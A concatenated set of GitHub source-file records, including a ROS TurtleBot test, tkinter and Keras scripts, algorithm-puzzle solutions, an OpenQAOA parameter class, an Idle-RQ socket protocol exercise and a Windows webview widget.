just makes sure TurtleBot receives the stop command prior to shutting down the script\n rospy.sleep(1)\n sys.exit(0)\n\n def do_test(self):\n # TurtleBot will stop if we don't keep telling it to move. How often should we tell it to move? 10 HZ\n r = rospy.Rate(10)\n\n # Twist is a datatype for velocity\n move_cmd = Twist()\n # let's go forward at 0.2 m/s\n move_cmd.linear.x = 0.2\n # let's turn at 0 radians/s\n move_cmd.angular.z = 0\n\n # Perform 10 times, random sleeps so time is undecidable.\n for i in range(0, 2):\n # publish the velocity\n for x in range(0, 20): # 20 = 2 seconds, r.sleep takes 0.1s (10Hz)\n self.drive_forwards()\n r.sleep()\n\n self.stop_driving()\n rnd = random.randint(1, 3)\n time.sleep(rnd) # Random sleep to generate random energy usage patterns\n\n for y in range(0, 10):\n self.drive_backwards()\n r.sleep()\n\n self.stop_driving()\n rnd = random.randint(1, 3)\n time.sleep(rnd) # Random sleep to generate random energy usage patterns\n\n for y in range(0, 10):\n self.drive_backwards()\n r.sleep()\n\n self.stop_driving()\n\n # Test run done, shutdown\n self.shutdown()\n\n def drive_forwards(self):\n # Twist is a datatype for velocity\n move_cmd = Twist()\n # let's go forward at 0.2 m/s\n move_cmd.linear.x = 0.2\n # let's turn at 0 radians/s\n move_cmd.angular.z = 0\n\n self.cmd_vel.publish(move_cmd)\n\n def drive_backwards(self):\n # Twist is a datatype for velocity\n move_cmd = Twist()\n # let's go forward at 0.2 m/s\n move_cmd.linear.x = -0.2\n # let's turn at 0 radians/s\n move_cmd.angular.z = 0\n\n self.cmd_vel.publish(move_cmd)\n\n def stop_driving(self):\n self.cmd_vel.publish(Twist())\n\n\nif __name__ == \"__main__\":\n TestRun()\n","repo_name":"StanSwanborn/robot-runner","sub_path":"examples/ros1/experiments/vu_battsim_18.04/scripts/test_run.py","file_name":"test_run.py","file_ext":"py","file_size_in_byte":3048,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"14799420342","text":"#!/usr/bin/env python\n\nimport tkinter\n\n\nclass MyApp(tkinter.Frame):\n def __init__(self, master):\n super().__init__(master)\n self.pack()\n \n self.cv = tkinter.Canvas(self, width=600, height=200)\n self.cv.pack()\n \n self.cv.create_arc(20, 20, 180, 180, fill=\"orange\", width=3, style=\"pieslice\")\n self.cv.create_arc(220, 20, 380, 180, fill=\"orange\", width=3, style=\"chord\")\n self.cv.create_arc(420, 20, 580, 180, fill=\"orange\", width=3, style=\"arc\")\n\n\nif __name__ == \"__main__\":\n root = tkinter.Tk()\n app = MyApp(root)\n app.mainloop()\n","repo_name":"Eskimo-SVD/Oliver_private_Bude","sub_path":"Python-Buch/36_Grafische_Benutzeroberflaechen/TkInter/canvas/arc.py","file_name":"arc.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"29162586659","text":"import sys\n\nn = int(sys.stdin.readline().rstrip())\nm = [[0] * 3 for _ in range(n)]\nsum = [[0] * 3 for _ in range(n)]\n\nfor i in range(n):\n m[i] = list(map(int, sys.stdin.readline().rstrip().split()))\n\n# 첫번째 비용을 저장\nsum[0][0] = m[0][0]\nsum[0][1] = m[0][1]\nsum[0][2] = m[0][2]\n\n# 2번째 부터 가능한 경우의 수를 sum에 저장(n이 1일 경우, index error)\nfor i in range(1, n):\n sum[i][0] = min(sum[i-1][1], sum[i-1][2]) + m[i][0]\n sum[i][1] = min(sum[i-1][0], sum[i-1][2]) + m[i][1]\n sum[i][2] = min(sum[i-1][0], sum[i-1][1]) + m[i][2]\n\n# n번째에서 최소합 출력\nprint(min(sum[n-1]))\n","repo_name":"Simu96/study_baekjoon","sub_path":"동적 계획법 1/1149.py","file_name":"1149.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41885331535","text":"# coding: utf-8\nimport numpy as np\nimport pandas as pd\nimport os\nimport sys\n\n# Keras\nfrom keras.utils import np_utils\nfrom keras.models import Sequential, load_model\nfrom keras.layers import Dense, Dropout, Activation, Conv2D, MaxPooling2D, Flatten, LeakyReLU, AveragePooling2D\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.callbacks import ModelCheckpoint\n\n# Constants\nDIRECTORY = \"ml-2018spring-hw3/\"\nMODEL_DIRECTORY = \"model/\"\nLABEL_MAP = {0: '生氣', 1: '厭惡', 2: '恐懼', 3: '高興', 4: '難過', 5: '驚訝', 6: '中立'}\n\n# Functions\ndef get_training_data(horizontal_flip=False, shuffle_data=False, validation_split=0.0):\n filepath = sys.argv[1]\n\n if os.path.exists(filepath):\n data = pd.read_csv(filepath)\n x_raw = data[\"feature\"]\n y_raw = data[\"label\"]\n \n # Split features into array & reshape to (48, 48, 1)\n x = x_raw.str.split(expand=True).values.reshape(-1, 48, 48, 1).astype('int')\n # One hot encoding\n y = np_utils.to_categorical(y_raw)\n # Add fliplr image to label 1\n if horizontal_flip:\n (x, y) = add_fliplr_image(x, y, y_raw, 1)\n if shuffle_data:\n (x, y) = shuffle(x, y)\n \n # Split validation set\n if validation_split > 0.0 and validation_split <= 1.0:\n valid_size = int(validation_split*len(x))\n x_train = x[:-valid_size]\n x_valid = x[-valid_size:]\n y_train = y[:-valid_size]\n y_valid = y[-valid_size:]\n else:\n x_train = x\n y_train = y\n x_valid = []\n y_valid = []\n else:\n print(\"Error: No such file at %s\" % filepath)\n\n return (x_train, y_train), (x_valid, y_valid), (x_raw, y_raw)\n \ndef output_prediction(y_test, filename=\"output.csv\"):\n arr = [[i, int(y_test[i])] for i in range(len(y_test))]\n dw = pd.DataFrame(arr, columns = [\"id\", \"label\"])\n dw.to_csv(filename, index=False)\n\ndef add_fliplr_image(x_train, y_train, y_raw, label):\n index = y_raw[y_raw == label].index\n category = np_utils.to_categorical([label], 7)\n total_categories = np.repeat(category, len(index), axis=0)\n total_images = np.empty((0, 48, 48, 1), int)\n\n for i in index:\n image = np.fliplr(x_train[i]).reshape(1, 48, 48, 1)\n total_images = np.append(total_images, image, axis=0)\n\n x_train = np.concatenate((x_train, total_images), axis=0)\n y_train = np.concatenate((y_train, total_categories), axis=0)\n return (x_train, y_train)\n\ndef shuffle(x_train, y_train):\n seed = np.arange(x_train.shape[0])\n np.random.shuffle(seed)\n x_train = x_train[seed]\n y_train = y_train[seed]\n return (x_train, y_train)\n\ndef main():\n (x_train, y_train), (x_valid, y_valid), (x_raw, y_raw) = get_training_data(\n horizontal_flip=False,\n shuffle_data=False,\n validation_split=0.1)\n\n # Transform to 0 to 1\n x_train = x_train / 255\n if len(x_valid) > 0:\n x_valid = x_valid / 255\n\n # Normalization\n if len(x_valid) > 0:\n x_total = np.concatenate((x_train, x_valid))\n else:\n x_total = np.concatenate((x_train))\n mean = np.mean(x_total)\n std = np.std(x_total)\n\n x_train = (x_train - mean) / std\n if len(x_valid) > 0:\n x_valid = (x_valid - mean) / std\n\n # np.save(\"distribution.npy\", [mean, std])\n\n # Image generator for data augmentation\n train_gen = ImageDataGenerator(\n zca_whitening=False,\n rotation_range=20,\n width_shift_range=0.2,\n height_shift_range=0.2,\n shear_range=0.1,\n zoom_range=0.2,\n horizontal_flip=True,\n fill_mode=\"nearest\")\n\n train_gen.fit(x_train)\n\n # Model configuration\n model = Sequential()\n\n # CNN\n model.add(Conv2D(64, 3, input_shape=(48, 48, 1), padding=\"same\", kernel_initializer=\"glorot_normal\"))\n model.add(LeakyReLU(alpha=0.05))\n model.add(BatchNormalization())\n model.add(MaxPooling2D(2, padding=\"same\"))\n model.add(Dropout(0.2))\n\n model.add(Conv2D(128, 3, padding=\"same\", kernel_initializer=\"glorot_normal\"))\n model.add(LeakyReLU(alpha=0.05))\n model.add(BatchNormalization())\n model.add(MaxPooling2D(2, padding=\"same\"))\n model.add(Dropout(0.2))\n\n model.add(Conv2D(256, 3, padding=\"same\", kernel_initializer=\"glorot_normal\"))\n model.add(LeakyReLU(alpha=0.05))\n model.add(BatchNormalization())\n model.add(MaxPooling2D(2, padding=\"same\"))\n model.add(Dropout(0.2))\n\n model.add(Conv2D(512, 3, padding=\"same\", kernel_initializer=\"glorot_normal\"))\n model.add(LeakyReLU(alpha=0.05))\n model.add(BatchNormalization())\n model.add(MaxPooling2D(2, padding=\"same\"))\n model.add(Dropout(0.2))\n\n model.add(Flatten())\n\n # DNN\n model.add(Dense(units=256, kernel_initializer=\"glorot_normal\"))\n model.add(Activation(\"relu\"))\n model.add(BatchNormalization())\n model.add(Dropout(0.5))\n\n model.add(Dense(units=512, kernel_initializer=\"glorot_normal\"))\n model.add(Activation(\"relu\"))\n model.add(BatchNormalization())\n model.add(Dropout(0.5))\n\n # Output layer\n model.add(Dense(units=7,activation=\"softmax\"))\n model.summary()\n\n # Checkpoint\n checkpoint_name = MODEL_DIRECTORY + \"checkpoint.h5\"\n checkpoint = ModelCheckpoint(checkpoint_name, monitor=\"val_acc\", verbose=1, save_best_only=True, mode=\"max\")\n\n # Training\n epochs = 100\n batch_size = 128\n steps_per_epoch = (x_train.shape[0]*5) // batch_size\n\n model.compile(loss=\"categorical_crossentropy\", optimizer=\"adam\", metrics=['accuracy'])\n train_history = model.fit_generator(\n train_gen.flow(x_train, y_train, batch_size=batch_size),\n steps_per_epoch=steps_per_epoch,\n epochs=epochs,\n validation_data=(x_valid, y_valid),\n callbacks=[checkpoint])\n\nif __name__ == \"__main__\":\n main()","repo_name":"taiyingchen/ML2018SPRING","sub_path":"hw3/hw3_train.py","file_name":"hw3_train.py","file_ext":"py","file_size_in_byte":5926,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"30957397695","text":"import pytest\nfrom selenium.webdriver.common.keys import Keys\n\nfrom helpers import get_item_input_box, wait_for_row_in_list_table\n\n\ndef test_layout_and_styling(new_browser):\n browser = new_browser()\n browser.set_window_size(1024, 768)\n\n # She notices the input box is nicely centered\n inputbox = get_item_input_box(browser)\n assert (\n pytest.approx(512, abs=10)\n == inputbox.location[\"x\"] + inputbox.size[\"width\"] / 2\n )\n\n # She starts a new list and sees the input is nicely\n # centered there too\n inputbox.send_keys(\"testing\")\n inputbox.send_keys(Keys.ENTER)\n wait_for_row_in_list_table(browser, \"1: testing\")\n inputbox = get_item_input_box(browser)\n assert (\n pytest.approx(512, abs=10)\n == inputbox.location[\"x\"] + inputbox.size[\"width\"] / 2\n )\n","repo_name":"yashkal/tdd-book","sub_path":"app/functional_tests/test_layout_and_styling.py","file_name":"test_layout_and_styling.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16248230051","text":"class Solution:\n def calPoints(self, ops: List[str]) -> int:\n totalSum = 0\n stack = []\n \n for op in ops:\n if op.isdigit() or op[1:].isdigit():\n stack.append(int(op))\n totalSum += int(op)\n elif op == \"C\":\n totalSum -= stack.pop()\n elif op == \"D\":\n stack.append(2 * stack[-1] )\n totalSum += stack[-1]\n else:\n stack.append(stack[-1] + stack[-2])\n totalSum += stack[-1]\n \n \n return totalSum\n ","repo_name":"AmanuelD02/Competitive-Programming","sub_path":"682-baseball-game/682-baseball-game.py","file_name":"682-baseball-game.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"10373950702","text":"from __future__ import annotations\nfrom typing import Union, Iterable\nfrom abc import ABC\nimport numpy as np\n\nfrom ..ansatz_constructor import QAOADescriptor\n\n\nclass QAOAVariationalBaseParams(ABC):\n \"\"\"\n A class that initialises and keeps track of the Variational\n parameters\n\n Parameters\n ----------\n qaoa_descriptor: `QAOADescriptor`\n Specify the circuit parameters to construct circuit angles to be\n used for training\n\n Attributes\n ----------\n qaoa_descriptor: `QAOADescriptor`\n p: `int`\n cost_1q_coeffs\n cost_2q_coeffs\n mixer_1q_coeffs\n mixer_2q_coeffs\n \"\"\"\n\n def __init__(self, qaoa_descriptor: QAOADescriptor):\n self.qaoa_descriptor = qaoa_descriptor\n self.p = self.qaoa_descriptor.p\n\n try:\n self.cost_1q_coeffs = qaoa_descriptor.cost_single_qubit_coeffs\n self.cost_2q_coeffs = qaoa_descriptor.cost_pair_qubit_coeffs\n self.mixer_1q_coeffs = qaoa_descriptor.mixer_single_qubit_coeffs\n self.mixer_2q_coeffs = qaoa_descriptor.mixer_pair_qubit_coeffs\n except AttributeError:\n self.cost_1q_coeffs = qaoa_descriptor.cost_hamiltonian.single_qubit_coeffs\n self.cost_2q_coeffs = qaoa_descriptor.cost_hamiltonian.pair_qubit_coeffs\n self.mixer_1q_coeffs = qaoa_descriptor.mixer_hamiltonian.single_qubit_coeffs\n self.mixer_2q_coeffs = qaoa_descriptor.mixer_hamiltonian.pair_qubit_coeffs\n\n def __len__(self):\n \"\"\"\n Returns\n -------\n int:\n the length of the data produced by self.raw() and accepted by\n self.update_from_raw()\n \"\"\"\n raise NotImplementedError()\n\n def __repr__(self):\n raise NotImplementedError()\n\n def __str__(self):\n return self.__repr__()\n\n @property\n def mixer_1q_angles(self) -> np.ndarray:\n \"\"\"2D array with the X-rotation angles.\n\n 1st index goes over p and the 2nd index over the qubits,\n to apply X-rotations on.\n \"\"\"\n raise NotImplementedError()\n\n @property\n def mixer_2q_angles(self) -> np.ndarray:\n \"\"\"2D array with the XX and YY-rotation angles.\n\n 1st index goes over p and the 2nd index over the qubit pairs,\n to apply XX and YY-rotations on.\n \"\"\"\n raise NotImplementedError()\n\n @property\n def cost_1q_angles(self) -> np.ndarray:\n \"\"\"2D array with the Z-rotation angles.\n\n 1st index goes over the p and the 2nd index over the qubits,\n to apply Z-rotations on.\n \"\"\"\n raise NotImplementedError()\n\n @property\n def cost_2q_angles(self) -> np.ndarray:\n \"\"\"2D array with ZZ-rotation angles.\n\n 1st index goes over the p and the 2nd index over the qubit\n pairs, to apply ZZ-rotations on.\n \"\"\"\n raise NotImplementedError()\n\n def update_from_raw(self, new_values: Union[list, np.array]):\n \"\"\"\n Update all the parameters from a 1D array.\n\n The input has the same format as the output of ``self.raw()``.\n This is useful for ``scipy.optimize.minimize`` which expects\n the parameters that need to be optimized to be a 1D array.\n\n Parameters\n ----------\n new_values: `Union[list, np.array]`\n A 1D array with the new parameters. Must have length ``len(self)``\n and the ordering of the flattend ``parameters`` in ``__init__()``.\n\n \"\"\"\n raise NotImplementedError()\n\n def raw(self) -> np.ndarray:\n \"\"\"\n Return the parameters in a 1D array.\n\n This 1D array is needed by ``scipy.optimize.minimize`` which expects\n the parameters that need to be optimized to be a 1D array.\n\n Returns\n -------\n np.array:\n The parameters in a 1D array. Has the same output format as the\n expected input of ``self.update_from_raw``. Hence corresponds to\n the flattened `parameters` in `__init__()`\n\n \"\"\"\n raise NotImplementedError()\n\n def update_from_dict(self, new_values: dict):\n \"\"\"\n Update all the parameters from a dictionary.\n\n The input has the same format as the output of ``self.asdict()``.\n\n Parameters\n ----------\n new_values: `dict`\n A dictionary with the new parameters. Must have the same keys as\n the output of ``self.asdict()``.\n\n \"\"\"\n\n assert isinstance(new_values, dict), f\"Expected dict, got {type(new_values)}\"\n\n for key, value in new_values.items():\n if key not in self.asdict().keys():\n raise KeyError(\n f\"'{key}' not in {self.__class__.__name__}, expected keys: {list(self.asdict().keys())}\"\n )\n else:\n if getattr(self, key).shape != np.array(value).shape:\n raise ValueError(\n f\"Shape of '{key}' does not match. Expected shape {getattr(self, key).shape}, got {np.array(value).shape}.\"\n )\n\n raw_params = []\n for key, value in self.asdict().items():\n if key in new_values.keys():\n raw_params += list(np.array(new_values[key]).flatten())\n else:\n raw_params += list(np.array(value).flatten())\n\n self.update_from_raw(raw_params)\n\n def asdict(self) -> dict:\n \"\"\"\n Return the parameters as a dictionary.\n\n Returns\n -------\n dict:\n The parameters as a dictionary. Has the same output format as the\n expected input of ``self.update_from_dict``.\n\n \"\"\"\n return {k[2:]: v for k, v in self.__dict__.items() if k[0:2] == \"__\"}\n\n @classmethod\n def linear_ramp_from_hamiltonian(\n cls, qaoa_descriptor: QAOADescriptor, time: float = None\n ):\n \"\"\"Alternative to ``__init__`` that already fills ``parameters``.\n\n Calculate initial parameters from register, terms, weights\n (specifiying a Hamiltonian), corresponding to a linear ramp\n annealing schedule and return a ``QAOAVariationalBaseParams`` object.\n\n Parameters\n ----------\n qaoa_descriptor: `QAOADescriptor`\n QAOADescriptor object containing information about terms,weights,register and p\n\n time: `float`\n Total annealing time. Defaults to ``0.7*p``.\n\n Returns\n -------\n QAOAVariationalBaseParams:\n The initial parameters for a linear ramp for ``hamiltonian``.\n\n \"\"\"\n raise NotImplementedError()\n\n @classmethod\n def random(cls, qaoa_descriptor: QAOADescriptor, seed: int = None):\n \"\"\"\n Initialise parameters randomly\n\n Parameters\n ----------\n qaoa_descriptor: `QAOADescriptor`\n QAOADescriptor object containing information about terms,\n weights, register and p.\n\n seed: `int`\n Use a fixed seed for reproducible random numbers\n\n Returns\n -------\n QAOAVariationalBaseParams:\n Randomly initialiased parameters\n \"\"\"\n raise NotImplementedError()\n\n @classmethod\n def empty(cls, qaoa_descriptor: QAOADescriptor):\n \"\"\"\n Alternative to ``__init__`` that only takes ``qaoa_descriptor`` and\n fills ``parameters`` via ``np.empty``\n\n Parameters\n ----------\n qaoa_descriptor: `QAOADescriptor`\n QAOADescriptor object containing information about terms,weights,register and p\n\n Returns\n -------\n QAOAVariationalBaseParams:\n A Parameter object with the parameters filled by ``np.empty``\n \"\"\"\n raise NotImplementedError()\n\n @classmethod\n def from_other_parameters(cls, params):\n \"\"\"Alternative to ``__init__`` that takes parameters with less degrees\n of freedom as the input.\n\n Parameters\n ----------\n params: `QAOAVaritionalBaseParams`\n The input parameters object to construct the new parameters object from.\n Returns\n -------\n QAOAVariationalBaseParams:\n The converted paramters s.t. all the rotation angles of the in\n and output parameters are the same.\n \"\"\"\n from . import converter\n\n return converter(params, cls)\n\n def raw_rotation_angles(self) -> np.ndarray:\n \"\"\"\n Flat array of the rotation angles for the memory map for the\n parametric circuit.\n\n Returns\n -------\n np.array:\n Returns all single rotation angles in the ordering\n ``(x_rotation_angles, gamma_singles, zz_rotation_angles)`` where\n ``x_rotation_angles = (beta_q0_t0, beta_q1_t0, ... , beta_qn_tp)``\n and the same for ``z_rotation_angles`` and ``zz_rotation_angles``\n\n \"\"\"\n raw_data = np.concatenate(\n (\n self.mixer_1q_angles.flatten(),\n self.mixer_2q_angles.flatten(),\n self.cost_1q_angles.flatten(),\n self.cost_1q_angles.flatten(),\n )\n )\n return raw_data\n\n def plot(self, ax=None, **kwargs):\n \"\"\"\n Plots ``self`` in a sensible way to the canvas ``ax``, if provided.\n\n Parameters\n ----------\n ax: `matplotlib.axes._subplots.AxesSubplot`\n The canvas to plot itself on\n kwargs:\n All remaining keyword arguments are passed forward to the plot\n function\n\n \"\"\"\n raise NotImplementedError()\n\n\nclass QAOAParameterIterator:\n \"\"\"An iterator to sweep one parameter over a range in a QAOAParameter object.\n\n Parameters\n ----------\n qaoa_params:\n The initial QAOA parameters, where one of them is swept over\n the_parameter:\n A string specifying, which parameter should be varied. It has to be\n of the form ``[i]`` where ```` is the name\n of the _internal_ list and ``i`` the index, at which it sits. E.g.\n if ``qaoa_params`` is of type ``AnnealingParams``\n and we want to vary over the second timestep, it is\n ``the_parameter = \"times[1]\"``.\n the_range:\n The range, that ``the_parameter`` should be varied over\n\n Todo\n ----\n - Add checks, that the number of indices in ``the_parameter`` matches\n the dimensions of ``the_parameter``\n - Add checks, that the index is not too large\n\n Example\n -------\n Assume qaoa_params is of type ``StandardWithBiasParams`` and\n has `p >= 2`. Then the following code produces a loop that\n sweeps ``gammas_singles[1]`` over the range ``(0, 1)`` in 4 layers:\n\n .. code-block:: python\n\n the_range = np.arange(0, 1, 0.4)\n the_parameter = \"gammas_singles[1]\"\n param_iterator = QAOAParameterIterator(qaoa_params, the_parameter, the_range)\n for params in param_iterator:\n # do what ever needs to be done.\n # we have type(params) == type(qaoa_params)\n \"\"\"\n\n def __init__(\n self,\n variational_params: QAOAVariationalBaseParams,\n the_parameter: str,\n the_range: Iterable[float],\n ):\n \"\"\"See class documentation for details\"\"\"\n self.params = variational_params\n self.iterator = iter(the_range)\n self.the_parameter, *indices = the_parameter.split(\"[\")\n indices = [i.replace(\"]\", \"\") for i in indices]\n if len(indices) == 1:\n self.index0 = int(indices[0])\n self.index1 = False\n elif len(indices) == 2:\n self.index0 = int(indices[0])\n self.index1 = int(indices[1])\n else:\n raise ValueError(\"the_parameter has to many indices\")\n\n def __iter__(self):\n return self\n\n def __next__(self):\n # get next value from the_range\n value = next(self.iterator)\n\n # 2d list or 1d list?\n if self.index1 is not False:\n getattr(self.params, self.the_parameter)[self.index0][self.index1] = value\n else:\n getattr(self.params, self.the_parameter)[self.index0] = value\n\n return self.params\n","repo_name":"entropicalabs/openqaoa","sub_path":"src/openqaoa-core/openqaoa/qaoa_components/variational_parameters/variational_baseparams.py","file_name":"variational_baseparams.py","file_ext":"py","file_size_in_byte":12174,"program_lang":"python","lang":"en","doc_type":"code","stars":94,"dataset":"github-code","pt":"31"} +{"seq_id":"5318585371","text":"from troubleMaker import *\n\nPARITY_BIT = 15\nSEQ_BIT = 14\nLAST_INDICATOR_BIT = 13\nACK_BIT = 12\nTIMEOUT_MSEC = 1200 #milli secs\nBUFSIZE = 10000\n \n# def testIdleRQ(num):\n# print( \"testIdleRQ with parameter num: \", num)\n# print(\"test import trouble-maker\")\n# testTroubleMaker(num)\n \ndef mysend(sockfile, buf, len, flags):\n # Convert bytes to bytearray for mutable operations\n tmp = bytearray(buf.encode())\n\n # Print the content of the buffer as byte bits\n print(\"Buf ({}):\".format(len))\n for byte in tmp:\n printbytebits(byte)\n\n # Make frames\n # frames = makeframes(tmp, len)\n frames = makeframes(buf, len)\n n = len\n print(\"Frames ({}):\".format(n))\n\n for i in range(n):\n print(\"> Sending I-frame {}: \".format(i), end='')\n printbits(frames[i])\n printstat(frames[i])\n mightsend(sockfile, tobits(frames[i]), frames[i])\n\n # Set a timeout for recv()\n sockfile.settimeout(TIMEOUT_MSEC / 1000.0)\n\n try:\n print(\"Timer Started: Waiting for an ACK frame ...\")\n ack = -1\n ack_data = sockfile.recv(BUFSIZE, ack)\n status = int.from_bytes(ack_data, byteorder='big')\n print(f\"recv: {ack_data}\")\n print(status)\n \n if status == 0:\n # the Secondary has closed the socket\n print(\"Secondary has closed connection, indicating proper transmission. ACK frame not needed. Primary process is terminating.\")\n break\n elif (status < 2): # Timer expired\n print(\"TIMEOUT: No response within %d millisecs. Retransmit this I-frame again.\\n\", TIMEOUT_MSEC)\n i-=1\n continue\n\n isack = testbit(ack, ACK_BIT)\n corrup = corrupted(ack)\n print(f\"> Receiving {'a corrupted' if corrup else 'ACK' if isack else 'NAK'} frame: \", end='')\n printbits(ack)\n printstat(ack)\n\n if isack:\n NS = testbit(frames[i], SEQ_BIT)\n NR = testbit(ack, SEQ_BIT)\n P0 = NS == NR\n P1 = not corrup\n\n if P0:\n if P1:\n print(\"Timer Stopped: Valid ACK N(S)=N(R)={} is received.\".format(NR))\n else:\n print(\"ACK frame received is corrupted\")\n print(\"Resend this I-frame again.\")\n i -= 1\n else:\n print(\"Error: Expected N(S)=N(R)={}, got N(S)={}\".format(NR, NS))\n\n if not P1:\n print(\"Error: Wrong Seq ACK and corrupted\")\n else:\n print(\"Error: Wrong Seq ACK and not corrupted\")\n else:\n print(\"Resend this I-frame again.\")\n i -= 1\n continue\n\n except socket.timeout:\n print(\"TIMEOUT: No response within {} millisecs. Retransmit this I-frame again.\".format(TIMEOUT_MSEC))\n i -= 1\n except Exception as e:\n print(\"Error:\", e)\n\n print(\"All {} frames sent\".format(n))\n return len\n\ndef myrecv(sockfile, buf, len, flags):\n # frames = [0] * (len + 1)\n frames = bytearray(len + 1)\n i = 0 # Frame number that we are waiting for\n\n while True:\n # PresentState=WTIFM; Waiting for event: IRCVD\n print(\"Waiting for an I-frame ...\")\n frame_data = sockfile.recv(2)\n \n if not frame_data:\n print(\"Primary has closed connection, unexpected behavior!\")\n return i\n \n frame = int.from_bytes(frame_data, byteorder='big')\n corrup = corrupted(frame)\n NS = testbit(frame, SEQ_BIT)\n Vr = i % 2\n P0 = NS == Vr\n P1 = not corrup\n P2 = NS == (not Vr)\n last = testbit(frame, LAST_INDICATOR_BIT) and P0 and P1\n print(f\" < Receiving {'a corrupted ' if corrup else 'the last ' if last else ''}I-frame {i}: \", end='')\n printbits(frame)\n printstat(frame)\n ack = 0\n X = NS\n # isack = 0\n \n if not P1:\n # TxNAK(X);\n isack = 0\n else:\n if P2:\n isack = 1\n print(\"The I-frame order is invalid. Duplication detected.\")\n print(f\"Expected N(S)=Vr={Vr}, got N(S)={X}\")\n elif P0:\n frames[i] = frame\n isack = 1\n i += 1\n else:\n print(\"P1 and not P2 and not P0, impossible\")\n\n ack = setbit(ack, ACK_BIT, isack)\n ack = setbit(ack, SEQ_BIT, X)\n ack = setbit(ack, PARITY_BIT, parity(ack))\n print(f\"> Sending {'ACK' if testbit(ack, ACK_BIT) else 'NAK'} frame: \", end='')\n printbits(ack)\n printstat(ack)\n mightsend(sockfile, ack)\n\n # Check for the last frame\n if last:\n print(\"Got the last frame, stopped\")\n break\n\n # Join packets from frames together into buf\n print(\"Joining frames ...\")\n joinframes(frames, buf, i)\n return len(buf)\n\n\ndef joinframes(frames, buf, len):\n for i in range(len):\n buf[i] = 0\n for j in range(8):\n if testbit(frames[i], j):\n buf[i] |= 1 << j\n buf[len] = 0\n\ndef makeframes(buf, len):\n print(buf)\n frames = bytearray(len + 1)\n # frames = [0] * (len + 1)\n fNo = 0 # current frame number that we are filling bits into\n done = False\n while not done:\n frames[fNo] = 0\n for i in range(8):\n if int(tobytebits(buf[fNo])) & (1 << i):\n frames[fNo] |= 1 << i\n \n # add seqNo bit\n if fNo % 2:\n # frames[fNo] |= 1 << SEQ_BIT\n setbit(frames[fNo], SEQ_BIT, 1)\n # print(fNo)\n if tobytebits(buf[fNo + 1]) == 0 or fNo + 1 >= len - 1:\n # frames[fNo] |= 1 << LAST_INDICATOR_BIT\n setbit(frames[fNo], LAST_INDICATOR_BIT, 1)\n done = True\n frames[fNo + 1] = 0\n \n # add parity bit\n if parity(frames[fNo]):\n # frames[fNo] |= 1 << PARITY_BIT\n setbit(frames[fNo], PARITY_BIT, 1)\n \n fNo += 1\n \n return frames\n\ndef parity(frame):\n result = 0\n for i in range(PARITY_BIT):\n result ^= (frame >> i) & 1\n return result\n\ndef corrupted(frame):\n return parity(frame) != ((frame >> PARITY_BIT) & 1)\n\ndef printstat(frame):\n print(\"\\n\")","repo_name":"emxzy03/idle-rq-unix","sub_path":"idleRQ.py","file_name":"idleRQ.py","file_ext":"py","file_size_in_byte":6520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33644548987","text":"\"\"\"\r\nEasy Player webview widget module.\r\n\r\nThis code has syntax errors in pycharm, but it runs normally.\r\n\"\"\"\r\n\r\nimport ctypes\r\nimport sys\r\nfrom typing import Tuple, Callable, Any\r\n\r\nfrom easyplayer.exceptions import EasyPlayerOSError, EasyPlayerSaverError, EasyPlayerModuleError\r\nfrom easyplayer.core.saver import queue\r\n\r\nif sys.platform != 'win32':\r\n raise EasyPlayerOSError('Only supported Windows OS')\r\n\r\nimport threading\r\n\r\ntry:\r\n import clr\r\nexcept (ImportError, ModuleNotFoundError):\r\n raise EasyPlayerModuleError('please install clr') from None\r\n\r\ntry:\r\n # Add reference\r\n clr.AddReference('System.Windows.Forms')\r\n clr.AddReference('System.Threading')\r\nexcept OSError:\r\n raise EasyPlayerOSError('Only supported Windows OS') from None\r\nfrom System.Windows.Forms import * # Pycharm syntax error\r\nfrom System.Threading import Thread, ApartmentState, ThreadStart # Pycharm syntax error\r\n\r\n_app = Application # Pycharm syntax error\r\n_user32 = ctypes.windll.user32\r\n\r\nclass _Form(object):\r\n \"\"\"\r\n Default form.\r\n \"\"\"\r\n\r\n\r\n__all__ = ['WebView']\r\n\r\n\r\nclass WebView(object):\r\n def __init__(self, size: Tuple[int, int] = (1200, 550), url: str = '',\r\n script_errors_suppressed: bool = True, menu_enabled: bool = True):\r\n \"\"\"\r\n Easy Player webview widget.\r\n \r\n Warning: available only on Windows system.\r\n \r\n :param size: Widget size.\r\n :param url: Default URL.\r\n :param script_errors_suppressed: Script errors suppressed.\r\n :param menu_enabled: Is the menu enabled.\r\n \"\"\"\r\n if not queue:\r\n raise EasyPlayerSaverError('please created a game first')\r\n self._game = queue[-1]\r\n self._screen = self._game.screen\r\n\r\n self.width, self.height = size\r\n \r\n form = _Form()\r\n # Must use thread\r\n threading.Thread(target=self._get_web, args=(form, self.width, self.height)).start()\r\n \r\n while True:\r\n try:\r\n ie = form.web\r\n break\r\n except AttributeError:\r\n pass\r\n \r\n ie.ScriptErrorsSuppressed = script_errors_suppressed\r\n self.ie_hwnd = int(str(ie.Handle))\r\n self.x, self.y = 0, 0\r\n # Use win32api\r\n _user32.SetParent(self.ie_hwnd, self._game.hwnd)\r\n self._move()\r\n \r\n if url != '':\r\n ie.Navigate(url)\r\n self.ie = ie\r\n self.ie.IsWebBrowserContextMenuEnabled = menu_enabled\r\n self.ie.NewWindow += self._before_window\r\n \r\n self.url = url\r\n \r\n @staticmethod\r\n def _get_web(form: _Form, width: int, height: int):\r\n \"\"\"\r\n Set the form attr.\r\n \r\n :param form: This form.\r\n :param width: Width.\r\n :param height: Height.\r\n :return: None\r\n \"\"\"\r\n web = WebBrowser() # Pycharm syntax error\r\n form.web = web\r\n 